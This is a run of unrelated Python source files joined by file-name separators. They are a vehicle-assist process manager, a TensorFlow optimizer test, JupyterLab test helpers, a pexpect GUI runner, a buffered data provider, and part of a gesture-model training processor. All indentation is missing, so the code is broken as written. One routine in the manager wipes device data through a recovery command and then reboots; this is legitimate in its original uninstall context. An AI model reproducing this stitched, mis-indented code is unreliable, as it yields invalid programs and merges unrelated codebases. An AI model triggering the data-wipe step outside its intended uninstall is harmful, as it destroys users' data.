if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoShutdown", "2"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightness", "0"),
("OpkrEnableDriverMonitoring", "1"),
("OpkrEnableLogger", "0"),
("OpkrEnableGetoffAlert", "1"),
("OpkrAutoResume", "1"),
("OpkrVariableCruise", "0"),
("OpkrLaneChangeSpeed", "60"),
("OpkrAutoLaneChangeDelay", "0"),
("OpkrSteerAngleCorrection", "0"),
("PutPrebuiltOn", "0"),
("FingerprintIssuedFix", "0"),
("LdwsCarFix", "0"),
("LateralControlMethod", "0"),
("CruiseStatemodeSelInit", "1"),
("InnerLoopGain", "30"),
("OuterLoopGain", "20"),
("TimeConstant", "10"),
("ActuatorEffectiveness", "15"),
("Scale", "1750"),
("LqrKi", "10"),
("DcGain", "30"),
("IgnoreZone", "0"),
("PidKp", "20"),
("PidKi", "40"),
("PidKf", "5"),
("CameraOffsetAdj", "60"),
("SteerRatioAdj", "135"),
("SteerActuatorDelayAdj", "30"),
("SteerRateCostAdj", "50"),
("SteerLimitTimerAdj", "80"),
("TireStiffnessFactorAdj", "75"),
("SteerMaxAdj", "380"),
("SteerDeltaUpAdj", "3"),
("SteerDeltaDownAdj", "7"),
("SteerMaxvAdj", "10"),
("OpkrBatteryChargingControl", "1"),
("OpkrBatteryChargingMin", "70"),
("OpkrBatteryChargingMax", "80"),
("OpkrUiOpen", "0"),
("OpkrDriveOpen", "0"),
("OpkrTuneOpen", "0"),
("OpkrControlOpen", "0"),
("LeftCurvOffsetAdj", "0"),
("RightCurvOffsetAdj", "0"),
("DebugUi1", "0"),
("DebugUi2", "0"),
("OpkrBlindSpotDetect", "0"),
("OpkrMaxAngleLimit", "90"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
test_model_avg_opt.py
|
"""Tests for ModelAverageOptimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import portpicker
import tensorflow as tf
from tefla.core.optimizer import ModelAverageOptimizer, ModelAverageCustomGetter, GLOBAL_VARIABLE_NAME
def create_local_cluster(num_workers, num_ps, protocol="grpc"):
"""Create local GRPC servers and return them."""
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = tf.train.ClusterSpec(cluster_dict)
workers = [
tf.train.Server(cs, job_name="worker", protocol=protocol, task_index=ix, start=True)
for ix in range(num_workers)
]
ps_servers = [
tf.train.Server(cs, job_name="ps", protocol=protocol, task_index=ix, start=True)
for ix in range(num_ps)
]
return cluster_dict, workers, ps_servers
# Create the workers and return their sessions, graphs and train ops.
# The chief worker applies its update last.
def _get_workers(num_workers, steps, workers):
sessions = []
graphs = []
train_ops = []
for worker_id in range(num_workers):
graph = tf.Graph()
is_chief = (worker_id == 0)
with graph.as_default():
worker_device = "/job:worker/task:%d/cpu:0" % (worker_id)
ma_coustom = ModelAverageCustomGetter(worker_device=worker_device)
with tf.variable_scope(
'', custom_getter=ma_coustom), tf.device(
tf.train.replica_device_setter(
worker_device=worker_device, ps_device="/job:ps/task:0/cpu:0", ps_tasks=1)):
global_step = tf.Variable(0, name='global_step', trainable=False)
var_0 = tf.get_variable(initializer=0.0, name="v0")
var_1 = tf.get_variable(initializer=1.0, name="v1")
with tf.device("/job:worker/task:" + str(worker_id)):
if worker_id == 0:
grads_0 = tf.constant(-1.0)
grads_1 = tf.constant(-1.0)
else:
grads_0 = tf.constant(-2.0)
grads_1 = tf.constant(-2.0)
sgd_opt = tf.train.GradientDescentOptimizer(1.0)
opt = ModelAverageOptimizer(
opt=sgd_opt,
num_worker=num_workers,
ma_custom_getter=ma_coustom,
is_chief=is_chief,
interval_steps=steps)
train_op = [opt.apply_gradients([[grads_0, var_0], [grads_1, var_1]], global_step)]
easgd_hook = opt.make_session_run_hook()
# Creates MonitoredSession
sess = tf.train.MonitoredTrainingSession(workers[worker_id].target, hooks=[easgd_hook])
sessions.append(sess)
graphs.append(graph)
train_ops.append(train_op)
return sessions, graphs, train_ops
class ModelAverageOptimizerTest(tf.test.TestCase):
def _run(self, train_op, sess):
sess.run(train_op)
def test1Workers2Period(self):
num_workers = 2
steps = 2
num_ps = 1
cluster, workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
sessions, graphs, train_ops = _get_workers(num_workers, steps, workers)
var_0 = graphs[0].get_tensor_by_name('v0:0')
var_1 = graphs[0].get_tensor_by_name('v1:0')
global_step = tf.train.get_global_step(graphs[0])
global_var_0 = graphs[0].get_tensor_by_name(GLOBAL_VARIABLE_NAME + "/v0:0")
global_var_1 = graphs[0].get_tensor_by_name(GLOBAL_VARIABLE_NAME + "/v1:0")
# Verify the initialized value.
self.assertAllEqual(0.0, sessions[0].run(var_0))
self.assertAllEqual(1.0, sessions[0].run(var_1))
self.assertAllEqual(0.0, sessions[0].run(global_var_0))
self.assertAllEqual(1.0, sessions[0].run(global_var_1))
self.assertAllEqual(0, sessions[0].run(global_step))
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
self.assertAllEqual(1.0, sessions[0].run(var_0))
self.assertAllEqual(2.0, sessions[0].run(var_1))
self.assertAllEqual(0.0, sessions[0].run(global_var_0))
self.assertAllEqual(1.0, sessions[0].run(global_var_1))
self.assertAllEqual(0, sessions[0].run(global_step))
    # iteration 2: global variable update
thread_0 = self.checkedThread(target=self._run, args=(train_ops[0], sessions[0]))
thread_1 = self.checkedThread(target=self._run, args=(train_ops[1], sessions[1]))
thread_0.start()
thread_1.start()
thread_0.join()
thread_1.join()
self.assertAllEqual(3.0, sessions[0].run(var_0))
self.assertAllEqual(4.0, sessions[0].run(var_1))
self.assertAllEqual(3.0, sessions[0].run(global_var_0))
self.assertAllEqual(4.0, sessions[0].run(global_var_1))
self.assertAllEqual(1, sessions[0].run(global_step))
# iteration 3
sessions[0].run(train_ops[0])
self.assertAllEqual(4.0, sessions[0].run(var_0))
self.assertAllEqual(5.0, sessions[0].run(var_1))
self.assertAllEqual(3.0, sessions[0].run(global_var_0))
self.assertAllEqual(4.0, sessions[0].run(global_var_1))
self.assertAllEqual(1, sessions[0].run(global_step))
def testPS2TasksWithClusterSpecClass(self):
cluster_spec = tf.train.ClusterSpec({
"ps": ["ps0:2222", "ps1:2222"],
"worker": ["worker0:2222", "worker1:2222", "worker2:2222"]
})
worker_device = "/job:worker/task:0"
ma_coustom = ModelAverageCustomGetter(worker_device=worker_device)
from tensorflow.python.training import device_setter
with tf.device(
tf.train.replica_device_setter(cluster=cluster_spec,
worker_device=worker_device,
ps_device="/job:ps")), \
tf.variable_scope('', custom_getter=ma_coustom):
v = tf.get_variable(initializer=[1, 2], name="v")
w = tf.get_variable(initializer=[2, 1], name='w')
v_g, w_g = ma_coustom._local_2_global[v], ma_coustom._local_2_global[w]
self.assertDeviceEqual("/job:worker/task:0", v.device)
self.assertDeviceEqual("job:ps/task:0", v_g.device)
self.assertDeviceEqual("/job:worker/task:0", w.device)
self.assertDeviceEqual("job:ps/task:1", w_g.device)
if __name__ == '__main__':
tf.test.main()
|
utils.py
|
from binascii import hexlify
import errno
import os
import sys
from os.path import join as pjoin
from tempfile import TemporaryDirectory
from threading import Thread, Event
from unittest.mock import patch
from jupyterlab_server import LabServerApp, LabConfig
from ..servertest import ServerTestBase
from ..server import url_path_join
import jupyter_core
from traitlets.config import Config
from tornado.ioloop import IOLoop
here = os.path.dirname(__file__)
class LabTestBase(ServerTestBase):
Application = LabServerApp
"""The application being tested. Sub-classes should change this."""
@classmethod
def setup_class(cls):
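        # Build an isolated environment (temp HOME/config/data dirs, patched jupyter paths),
        # then boot the Lab server on a background thread and wait until it responds.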
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
cls.data_dir = tmp('data')
cls.config_dir = tmp('config')
cls.runtime_dir = tmp('runtime')
cls.lab_dir = tmp('lab')
cls.app_settings_dir = tmp('appsettings')
cls.lab_schemas = tmp('labschemas')
cls.lab_settings = tmp('labsettings')
cls.lab_workspaces = tmp('labworkspaces')
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR': cls.config_dir,
'JUPYTER_DATA_DIR': cls.data_dir,
'JUPYTER_RUNTIME_DIR': cls.runtime_dir,
'JUPYTERLAB_DIR': cls.lab_dir,
'JUPYTERLAB_SETTINGS_DIR': cls.lab_settings
})
cls.env_patch.start()
cls.lab_config = LabConfig(
app_settings_dir=cls.app_settings_dir,
schemas_dir=cls.lab_schemas,
user_settings_dir=cls.lab_settings,
workspaces_dir=cls.lab_workspaces)
cls.notebook_dir = tmp('notebooks')
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
cls.config = cls.config or Config()
cls.config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
def start_thread():
if 'asyncio' in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = cls.Application(
app_dir=cls.lab_dir,
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=cls.config,
allow_root=True,
token=cls.token,
lab_config=cls.lab_config
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
class APITester(object):
"""Wrapper for REST API requests"""
url = '/'
def __init__(self, request):
self.request = request
def _req(self, verb, path, body=None):
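        # Issue the request; on a 4xx/5xx response, surface the server's JSON error message before raising.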
response = self.request(verb,
url_path_join(self.url, path), data=body)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()['message']
except Exception:
pass
response.raise_for_status()
return response
|
pexpect_runner.py
|
#!/usr/bin/python
import sys
import pexpect
import os
from Tkinter import *
import Pmw
import threading
import signal
import time
import Queue
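# Spawn a command under pexpect, mirror its output into a Pmw ScrolledText window
# via a thread-safe queue, and write everything to a log file.
# Usage: pexpect_runner.py <log file> <window title> <command> [args...]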
def sighandler(signum, frame):
# print "Signaled: %d" %signum
if signum == signal.SIGCHLD:
sys.exit(1)
else:
text_queue.put("SIGQUIT")
def process_poller():
    # command to run is arguments 3->end
global text
global exitThread
command = " ".join(sys.argv[3:])
print "Running command %s"%command
child = pexpect.spawn(command)
logfd = open(sys.argv[1],'w')
child.logfile = logfd
logfd.write("%s: Running command \"%s\"\n"%(sys.argv[0],command))
time.sleep(2)
while True:
try:
child.expect('\r\n',timeout=1)
if exitThread:
try:
child.kill(signal.SIGINT)
child.wait()
except:
print("KILL")
break
if len(child.before):
text_queue.put(child.before)
# text.appendtext(child.before + "\n")
except pexpect.EOF:
text_queue.put("**EXIT**")
# text.appendtext("**EXIT**")
break
except pexpect.TIMEOUT:
if exitThread:
try:
child.kill(signal.SIGINT)
child.wait()
except:
print("KILL")
break
if len(child.before):
text_queue.put(child.before)
# text.appendtext(child.before + "\n")
def poll_text():
# check queue
try:
while True:
msg = text_queue.get(block = False)
if msg == "SIGQUIT":
root.quit()
return
else:
text.appendtext(msg + "\n")
text_queue.task_done()
except Queue.Empty:
pass
# reschedule
root.after(100,poll_text)
def main(argv=None):
# argument list
# 0 = binary (pexpect_runner.py)
# 1 = log file
# 2 = title for window
# 3... = binary to run
global root
root = Pmw.initialise()
root.title(sys.argv[2])
global text
text = Pmw.ScrolledText(root,hscrollmode="dynamic",vscrollmode="dynamic")
text.pack(expand=1,fill='both')
global exitThread
exitThread = False
global text_queue
text_queue = Queue.Queue()
poller_thread = threading.Thread(target=process_poller)
poller_thread.start()
# register signal handler
signal.signal(signal.SIGINT,sighandler)
signal.signal(signal.SIGTERM,sighandler)
signal.signal(signal.SIGCHLD,sighandler)
root.after(0,poll_text)
root.mainloop()
exitThread = True
    # wait for the poller thread to exit
poller_thread.join()
if __name__ == "__main__":
sys.exit(main())
|
buffered_data_provider.py
|
import plotter_controller
import random_data_provider
from threading import Thread, Lock, Condition
import random
import time
class BufferedDataProvider(plotter_controller.StepDataProvider):
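    # Wraps a StepDataProvider and prefetches its steps on a background thread:
    # a daemon thread fills write_buffer while the consumer drains read_buffer, and the
    # two buffers are swapped under swap_condition whenever the read buffer runs empty,
    # so getStep() rarely has to block on the underlying provider.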
# Buffer size is in number of steps
def __init__(self, data_provider, buffer_size=1024):
#Setup buffers
self.read_buffer = []
self.write_buffer = []
self.buffer_size = buffer_size
self.data_provider = data_provider
#Threading init
self.data_loader_thread = Thread(target=self.dataLoaderThread)
self.swap_condition = Condition()
self.data_loader_thread.daemon = True
self.data_loader_thread.start()
def swapBuffers(self):
temp_buffer = self.read_buffer
self.read_buffer = self.write_buffer
self.write_buffer = temp_buffer
def requestSwap(self):
if(len(self.read_buffer) <= 0 and len(self.write_buffer) > 0):
self.swapBuffers()
self.swap_condition.notify_all()
def putStep(self):
self.swap_condition.acquire()
#print("Wait here with ", len(self.write_buffer), self.buffer_size)
while(len(self.write_buffer) == self.buffer_size):
#print("Wait for empty")
self.swap_condition.wait()
#print("Wake for empty")
step = self.data_provider.getStep()
self.write_buffer.append(step)
self.requestSwap()
self.swap_condition.release()
def dataLoaderThread(self):
while(self.data_provider.hasData()):
self.putStep()
def getStep(self):
self.swap_condition.acquire()
self.requestSwap()
#print("sizes",len(self.read_buffer), len(self.write_buffer))
        #The last two conditions are strictly speaking not required, but they ensure that no inconsistent ordering occurs while the remaining data is drained.
while(len(self.read_buffer) <= 0 and (len(self.write_buffer) > 0 or self.data_provider.hasData())):
#print("Wait for fill")
self.swap_condition.wait()
#print("Wake for fill")
step = self.read_buffer.pop(0)
if(len(self.read_buffer) == 0):
self.requestSwap()
self.swap_condition.release()
return step
def hasData(self):
self.swap_condition.acquire()
has_data = len(self.read_buffer) > 0 or len(self.write_buffer) > 0 or self.data_provider.hasData()
self.swap_condition.release()
return has_data
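# Self-test: feed a RandomDataProvider through BufferedDataProvider and check that every step
# matches the provider's recorded interaction_list, optionally sleeping between reads to
# emulate a slow consumer.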
def runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=0, consume_delay_width=0):
do_delay = consume_delay != 0
random.seed(1235)
for i in range(number_of_data):
if(not buffered_provider.hasData()):
raise Exception("Test failed, the provider claimed that data is not accessable")
        if(do_delay):
            random_time = (consume_delay_width * random.random()) - consume_delay_width
            sleep_time = max(0, consume_delay + random_time)
            time.sleep(sleep_time)  # emulate a slow consumer
step = buffered_provider.getStep()
correct_step = original_provider.interaction_list.pop(0)
if(step != correct_step):
raise Exception("Test failed as data is not correct compared to reference")
print("%.2f"%(i * 100.0 / number_of_data), end="\r")
if(buffered_provider.hasData()):
raise Exception("The data provider claims it has data when it doesn't")
def testNodelay(buffer_size, number_of_data=10000):
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data)
def testFasterProvider(buffer_size, number_of_data=10000):
basic_delay = 0.01
basic_delay_width = 0.01
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123, delay_time=basic_delay/2, random_delay_variation=basic_delay_width/2)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=basic_delay, consume_delay_width=basic_delay_width)
def testFasterConsumer(buffer_size, number_of_data=10000):
basic_delay = 0.01
basic_delay_width = 0.01
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123, delay_time=basic_delay, random_delay_variation=basic_delay_width)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=basic_delay/2, consume_delay_width=basic_delay_width/2)
def testEqualTime(buffer_size, number_of_data=10000):
basic_delay = 0.01
basic_delay_width = 0.01
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123, delay_time=basic_delay, random_delay_variation=basic_delay_width)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=basic_delay, consume_delay_width=basic_delay_width)
def run_test():
for buffer_size in [1, 2, 3, 8, 123, 512, 1001]:
print("No delay buffer size %d:"%(buffer_size))
testNodelay(buffer_size)
print("Faster provider buffer size %d:"%(buffer_size))
testFasterProvider(buffer_size)
print("Faster consumer buffer size %d:"%(buffer_size))
testFasterConsumer(buffer_size)
print("Equal time buffer size %d:"%(buffer_size))
testEqualTime(buffer_size)
print("All tests passed!")
if __name__ == "__main__":
run_test()
|
processor_v2_abl_audio.py
|
import datetime
import lmdb
import math
import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
import pyarrow
import python_speech_features as ps
import threading
import time
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from librosa.feature import mfcc
from os.path import join as jn
from torchlight.torchlight.io import IO
import utils.common as cmn
from net.embedding_space_evaluator import EmbeddingSpaceEvaluator
from net.ser_att_conv_rnn_v1 import AttConvRNN
from net.multimodal_context_net_v2_abl_audio import PoseGeneratorTriModal as PGT, ConvDiscriminatorTriModal as CDT
from net.multimodal_context_net_v2_abl_audio import PoseGenerator, AffDiscriminator
from utils.average_meter import AverageMeter
from utils.data_preprocessor import DataPreprocessor
from utils.gen_utils import create_video_and_save
from utils import losses
from utils.ted_db_utils import *
torch.manual_seed(1234)
rec_loss = losses.quat_angle_loss
def find_all_substr(a_str, sub):
start = 0
while True:
start = a_str.find(sub, start)
if start == -1:
return
yield start
start += len(sub) # use start += 1 to find overlapping matches
def get_epoch_and_loss(path_to_model_files, epoch='best'):
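    # Scan the saved-model directory and return (file name, epoch, loss), with epoch and loss
    # parsed from the underscore-separated file name; epoch='best' selects by the recorded loss.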
all_models = os.listdir(path_to_model_files)
if len(all_models) < 2:
return '', None, np.inf
if epoch == 'best':
loss_list = -1. * np.ones(len(all_models))
for i, model in enumerate(all_models):
loss_val = str.split(model, '_')
if len(loss_val) > 1:
loss_list[i] = float(loss_val[3])
if len(loss_list) < 3:
best_model = all_models[np.argwhere(loss_list == min([n for n in loss_list if n > 0]))[0, 0]]
else:
loss_idx = np.argpartition(loss_list, 2)
best_model = all_models[loss_idx[1]]
all_underscores = list(find_all_substr(best_model, '_'))
# return model name, best loss
return best_model, int(best_model[all_underscores[0] + 1:all_underscores[1]]), \
float(best_model[all_underscores[2] + 1:all_underscores[3]])
assert isinstance(epoch, int)
found_model = None
for i, model in enumerate(all_models):
model_epoch = str.split(model, '_')
if len(model_epoch) > 1 and epoch == int(model_epoch[1]):
found_model = model
break
if found_model is None:
return '', None, np.inf
all_underscores = list(find_all_substr(found_model, '_'))
return found_model, int(found_model[all_underscores[0] + 1:all_underscores[1]]), \
float(found_model[all_underscores[2] + 1:all_underscores[3]])
class Processor(object):
"""
Processor for emotive gesture generation
"""
def __init__(self, base_path, args, s2eg_config_args, data_loader, pose_dim, coords,
audio_sr, min_train_epochs=20, zfill=6):
self.device = torch.device('cuda:{}'.format(torch.cuda.current_device())
if torch.cuda.is_available() else 'cpu')
self.base_path = base_path
self.args = args
self.s2eg_config_args = s2eg_config_args
self.data_loader = data_loader
self.result = dict()
self.iter_info = dict()
self.epoch_info = dict()
self.meta_info = dict(epoch=0, iter=0)
self.io = IO(
self.args.work_dir_s2eg,
save_log=self.args.save_log,
print_log=self.args.print_log)
# model
self.pose_dim = pose_dim
self.coords = coords
self.audio_sr = audio_sr
self.time_steps = self.data_loader['train_data_s2eg'].n_poses
self.audio_length = self.data_loader['train_data_s2eg'].expected_audio_length
self.spectrogram_length = self.data_loader['train_data_s2eg'].expected_spectrogram_length
self.mfcc_length = int(np.ceil(self.audio_length / 512))
self.num_mfcc = self.data_loader['train_data_s2eg'].num_mfcc_combined
self.best_s2eg_loss = np.inf
self.best_s2eg_loss_epoch = None
self.s2eg_loss_updated = False
self.min_train_epochs = min_train_epochs
self.zfill = zfill
self.lang_model = self.data_loader['train_data_s2eg'].lang_model
self.train_speaker_model = self.data_loader['train_data_s2eg'].speaker_model
self.val_speaker_model = self.data_loader['val_data_s2eg'].speaker_model
self.test_speaker_model = self.data_loader['test_data_s2eg'].speaker_model
self.trimodal_generator = PGT(self.s2eg_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2eg_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
z_obj=self.train_speaker_model)
self.trimodal_discriminator = CDT(self.pose_dim)
self.use_mfcc = False
self.s2eg_generator = PoseGenerator(self.s2eg_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2eg_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
mfcc_length=self.mfcc_length,
num_mfcc=self.num_mfcc,
time_steps=self.time_steps,
z_obj=self.train_speaker_model)
# self.s2eg_discriminator = CDT(self.pose_dim)
self.s2eg_discriminator = AffDiscriminator(self.pose_dim)
self.evaluator_trimodal = EmbeddingSpaceEvaluator(self.s2eg_config_args, self.pose_dim,
self.lang_model, self.device)
self.evaluator = EmbeddingSpaceEvaluator(self.s2eg_config_args, self.pose_dim,
self.lang_model, self.device)
if self.args.use_multiple_gpus and torch.cuda.device_count() > 1:
self.args.batch_size *= torch.cuda.device_count()
self.trimodal_generator = nn.DataParallel(self.trimodal_generator)
self.trimodal_discriminator = nn.DataParallel(self.trimodal_discriminator)
self.s2eg_generator = nn.DataParallel(self.s2eg_generator)
self.s2eg_discriminator = nn.DataParallel(self.s2eg_discriminator)
else:
self.trimodal_generator.to(self.device)
self.trimodal_discriminator.to(self.device)
self.s2eg_generator.to(self.device)
self.s2eg_discriminator.to(self.device)
npz_path = jn(self.args.data_path, self.args.dataset_s2ag, 'npz')
os.makedirs(npz_path, exist_ok=True)
self.num_test_samples = self.data_loader['test_data_s2ag'].n_samples
if self.args.train_s2ag:
self.num_train_samples = self.data_loader['train_data_s2ag'].n_samples
self.num_val_samples = self.data_loader['val_data_s2ag'].n_samples
self.num_total_samples = self.num_train_samples + self.num_val_samples + self.num_test_samples
print('Total s2ag training data:\t\t{:>6} ({:.2f}%)'.format(
self.num_train_samples, 100. * self.num_train_samples / self.num_total_samples))
print('Training s2ag with batch size:\t{:>6}'.format(self.args.batch_size))
train_dir_name = jn(npz_path, 'train')
if not os.path.exists(train_dir_name):
self.save_cache('train', train_dir_name)
self.load_cache('train', train_dir_name)
print('Total s2ag validation data:\t\t{:>6} ({:.2f}%)'.format(
self.num_val_samples, 100. * self.num_val_samples / self.num_total_samples))
val_dir_name = jn(npz_path, 'val')
if not os.path.exists(val_dir_name):
self.save_cache('val', val_dir_name)
self.load_cache('val', val_dir_name)
else:
self.train_samples = None
self.val_samples = None
self.num_total_samples = self.num_test_samples
print('Total s2ag testing data:\t\t{:>6} ({:.2f}%)'.format(
self.num_test_samples, 100. * self.num_test_samples / self.num_total_samples))
test_dir_name = jn(npz_path, 'test')
if not os.path.exists(test_dir_name):
self.save_cache('test', test_dir_name)
self.lr_s2eg_gen = self.s2eg_config_args.learning_rate
self.lr_s2eg_dis = self.s2eg_config_args.learning_rate * self.s2eg_config_args.discriminator_lr_weight
# s2eg optimizers
self.s2eg_gen_optimizer = optim.Adam(self.s2eg_generator.parameters(),
lr=self.lr_s2eg_gen, betas=(0.5, 0.999))
self.s2eg_dis_optimizer = torch.optim.Adam(
self.s2eg_discriminator.parameters(),
lr=self.lr_s2eg_dis,
betas=(0.5, 0.999))
def load_cache(self, part, dir_name, load_full=True):
print('Loading {} cache'.format(part), end='')
if load_full:
start_time = time.time()
npz = np.load(jn(dir_name, '../full', part + '.npz'), allow_pickle=True)
samples_dict = {'extended_word_seq': npz['extended_word_seq'],
'vec_seq': npz['vec_seq'],
'audio': npz['audio'],
'audio_max': npz['audio_max'],
'mfcc_features': npz['mfcc_features'].astype(np.float16),
'vid_indices': npz['vid_indices']
}
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' took {:>6} seconds.'.format(int(np.ceil(time.time() - start_time))))
else:
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
samples_dict = {'extended_word_seq': [],
'vec_seq': [],
'audio': [],
'audio_max': [],
'mfcc_features': [],
'vid_indices': []}
for k in range(num_samples):
start_time = time.time()
npz = np.load(jn(dir_name, str(k).zfill(6) + '.npz'), allow_pickle=True)
samples_dict['extended_word_seq'].append(npz['extended_word_seq'])
samples_dict['vec_seq'].append(npz['vec_seq'])
samples_dict['audio'].append(npz['audio'])
samples_dict['audio_max'].append(npz['audio_max'])
samples_dict['mfcc_features'].append(npz['mfcc_features'].astype(np.float16))
samples_dict['vid_indices'].append(npz['vid_indices'])
time_taken = time.time() - start_time
time_remaining = np.ceil((num_samples - k - 1) * time_taken)
print('\rLoading {} cache {:>6}/{}, estimated time remaining {}.'.format(part, k + 1, num_samples,
str(datetime.timedelta(seconds=time_remaining))), end='')
for dict_key in samples_dict.keys():
samples_dict[dict_key] = np.stack(samples_dict[dict_key])
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' Completed.')
def save_cache(self, part, dir_name):
data_s2ag = self.data_loader['{}_data_s2ag'.format(part)]
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
speaker_model = self.train_speaker_model if part == 'train' else (self.val_speaker_model if part == 'val' else self.test_speaker_model)
extended_word_seq_all = np.zeros((num_samples, self.time_steps), dtype=np.int64)
vec_seq_all = np.zeros((num_samples, self.time_steps, self.pose_dim))
audio_all = np.zeros((num_samples, self.audio_length), dtype=np.int16)
audio_max_all = np.zeros(num_samples)
mfcc_features_all = np.zeros((num_samples, self.num_mfcc, self.mfcc_length))
vid_indices_all = np.zeros(num_samples, dtype=np.int64)
